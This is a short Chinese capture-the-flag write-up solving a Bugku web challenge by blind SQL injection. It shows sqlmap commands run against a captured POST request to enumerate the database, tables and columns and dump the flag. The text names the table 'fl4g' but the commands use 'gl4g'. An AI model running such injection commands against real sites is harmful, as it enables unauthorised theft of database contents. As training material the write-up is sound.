【Writeup】Bugku-Web-成绩单

 

打开来是成绩查询的界面

随便输入一下1得到：

基本已经能确定是sql注入的题了，但这道题没有回显，手动测试很麻烦（我也不太会），所以用sqlmap

burp抓包，发现是一个post请求，将请求内容复制下来在kali中保存为一个txt（这样要比直接测试url快）

（此处插播一个小点——刚配置好的kali是不能直接获取物理机上剪贴板的内容的，需要执行以下操作：

接下来通过sqlmap找当前数据库的名字：

sqlmap -r chengji.txt -p id --current-db

继续查找其中的tables：

sqlmap -r chengji.txt -p id -D skctf_flag --tables

flag应该在fl4g这个表中，继续查找字段：

sqlmap -r chengji.txt -p id -D skctf_flag -T gl4g --columns

只有一个字段就是我们需要的flag，查看一下它的内容：

sqlmap -r chengji.txt -p id -D skctf_flag -T gl4g -C skctf_flag --dump

得到flag

 

---

我本次使用sqlmap的时候不知道为什么特别慢，总是出现下面这句话，不知道怎么能解决一下

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')?